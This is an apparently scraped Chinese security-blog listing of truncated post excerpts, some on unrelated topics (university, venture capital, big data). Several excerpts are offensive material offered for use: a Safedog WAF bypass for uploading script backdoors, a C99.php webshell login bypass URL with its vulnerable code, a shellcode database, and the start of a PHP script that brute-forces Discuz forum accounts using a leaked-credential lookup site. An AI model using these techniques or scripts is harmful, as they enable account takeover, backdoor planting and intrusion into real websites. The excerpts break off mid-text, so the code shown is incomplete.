Windows下使用特殊文件名绕过安全狗上传脚本后门[3.3 08722]

绕过安全狗上传[3.3 08722] 90_ | 2014-06-27 13:42 ########################################## # Title :绕过安全狗上传[3.3 08722] # Team :08 Security Team # Author :08安全团队 # 首发 : 08安全团队 ####################################### 这次过狗上传思路和之前

C99.PHP webshell 绕过登陆密码漏洞

From: Every C99.php Shell Is Backdoored (A.K.A. Free Shells for Everyone!) C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。 http://127.0.0.1/c99.php?c99shcook[login]=0 可直接登陆。 @extract($_REQUEST["c99shcook"]); 变量覆盖 if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))

上大学有什么用?

我还小的时候,村里人便叫我大学生,因为他们觉得爱看书的孩子一定能考上大学。在他们眼中,中国只有两所大学,一个叫清华,一个叫北大。这是好事,也

我所知道的黑暗创投圈

和标题同名的那家创投服务的同学不用太紧张,不要以为你们取巧取了个这样的名字就能做三个代表了。我就不细说你们创始人在某个投资人的内部会上被台下

对于一个http请求,如何找里面的安全漏洞,能否自动化完成呢?

对于一个http请求,如何找里面的安全漏洞,能否自动化完成呢? xsser (十根阳具有长短!!) | 2014-06-16 14:25 POST /cpc/incrementPV HTTP/1.1 Host: x.com Content-Length: 48 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://x.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like

Shellcodes database,各类系统 Shellcode 大全

Shellcodes database Description This page lists some shellcodes and proposes an API to search a specific shellcode. If you want add your shellcode in this database, send an email at submit at shell-storm org. API This is very straightforward to communicate with this API. Just send a simple GET method. The "s" argument contains your keyword. http://shell-storm.org/api/?s=<keyword> Use "*" for multiple keyword search. /?s=<keyword1>*<keyword2>*<keyword3> The output will be like that

什么是大数据?

什么是大数据?   某比萨店的电话铃响了,客服人员拿起电话。   客服:XXX比萨店。您好,请问有什么需要我为您服务? 顾客:你好,我想要一份…… 客服

Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本

<?php class fuckdz{ public function sgk($user){ $a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto="); $a=iconv("UTF-8", "GB2312//IGNORE", $a); preg_match_all("/7%\">(.*)</isU",$a,$arr); unset($arr[0]); foreach ($arr as $key=>$r){ return $r; } } public function getuid($host,$uid){ $a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid"); if(!strpos($a,"charset=gbk")){ $a=iconv("UTF-8", "GB2312//IGNORE", $a); } preg_match("/<title>(.*)的/isU",$a,$